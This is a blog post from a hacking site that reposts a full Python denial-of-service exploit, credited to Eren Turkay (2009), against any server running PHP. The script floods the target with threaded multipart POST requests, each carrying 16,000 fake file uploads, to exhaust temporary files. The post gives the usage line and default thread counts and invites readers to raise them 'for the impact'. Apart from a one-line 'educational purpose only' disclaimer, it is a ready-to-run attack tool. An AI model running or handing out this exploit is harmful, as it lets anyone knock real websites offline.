DOS Exploit for PHP hosts - Python ~ Hack The Dark

While surfing the internet I just got my hands on a very cool python exploit wrote by Euren which can cause Denial of Service to any host running PHP over it. It doesn't matter whether the script handles uploads or not. If host runs PHP, it is enough to cause DOS using any PHP script it serves.

By default this code will create 100 threads, each thread will send 10 requests. You're always free to increase or decrease these numbers for the impact.

Warning: This script is for educational purpose only. Use it at your own risk.

import socket

import random

import time

import threading

import sys

class Connection:

def __init__(self, host, port):

self._host = host

self._port = port

self.sock = None

def connect(self):

self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

self.sock.connect((self._host, self._port))

def send(self, msg):

if not self.sock:

raise "NotConnected"

else:

self.sock.send(msg)

def close(self):

self.sock.close()

class Exploit (threading.Thread):

def __init__(self, host, port, target):

self._host = host

self._port = port

self._target = target

threading.Thread.__init__(self)

def getBoundary(self):

""" Return random boundary data """

random.seed()

rnd = random.randrange(100000, 100000000)

data = "---------------------------%s" % rnd

return data

def createPayload(self):

data = """POST %(target)s HTTP/1.1\r

Host: %(host)s\r

Uset-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)\r

Connection: keep-alive\r

Content-Type: multipart/form-data; boundary=%(boundary)s\r

Content-Length: %(length)s\r\n\r\n"""

boundary = self.getBoundary()

# Create a number of upload data, 16.000, yeah! :)

for i in range(16000):

data += "--%s\r\n" % boundary

data += """Content-Disposition: form-data; name="file_%s"; filename="file_%s.txt"\r

Content-Type: text/plain\r\n

Lorem ipsum dolor sit amet, consectetur adipiscing elit. In non blandit augue.\n\r\n""" % (i, i)

data += "--%s--\r\n" % boundary

return data % {"host": self._host, "target": self._target, "boundary": boundary, "length": str(len(data))}

def run(self):

payload = self.createPayload()

for i in range(0, 10):

c = Connection(self._host, self._port)

c.connect()

c.send(payload)

c.close()

sys.exit(0)

del payload

sys.exit(0)

def usage():

usage_data = """

__^__ __^__

( ___ )------------------------------------------------( ___ )

| / | | \ |

| / | Eren Turkay <eren .-. pardus.org.tr>, 2009/11/20 | \ |

| / | http://www.pardus.org.tr/eng/ | \ |

|___| |___|

(_____)------------------------------------------------(_____)

PHP denial of service exploit via temporary file exhaustion

Usage: python php-multipart-dos.py <host> <port> </adress/index.php> <child number: optional>

See source code for more information

"""

print usage_data

if __name__ == '__main__':

if not len(sys.argv) >= 4:

usage()

else:

# is child number passed?

if len(sys.argv) >= 5:

child = int(sys.argv[4])

else:

child = 100

print "[+] Attack started..."

for i in range(0, child):

try:

exp = Exploit(str(sys.argv[1]), int(sys.argv[2]), str(sys.argv[3]))

exp.start()

print "[+] Opening %s childs... [%s]\r" % (child, i+1),

sys.stdout.flush()

i += 1

except KeyboardInterrupt:

print "\n[-] Keyboard Interrupt. Exiting..."

sys.exit(1)

# print it so that previous "Opening childs..." is still there

print ""

while True:

try:

activeChilds = threading.activeCount()

print "[+] Waiting for childs to finish. %d remaining...\r" % activeChilds,

sys.stdout.flush()

# we have one main process

if activeChilds == 1:

print "\nOK!"

sys.exit(0)

except KeyboardInterrupt:

print "\n[-] Exiting without waiting!"

sys.exit(1)

Having troubles in compiling the code ? Take a look at How to Compile a Python Program.

Stay tuned for more tricks.

About Gaurav Singh

Part time tech blogger.

Hack The Dark

DOS Exploit for PHP hosts - Python

About Gaurav Singh

Related Post

1 comments: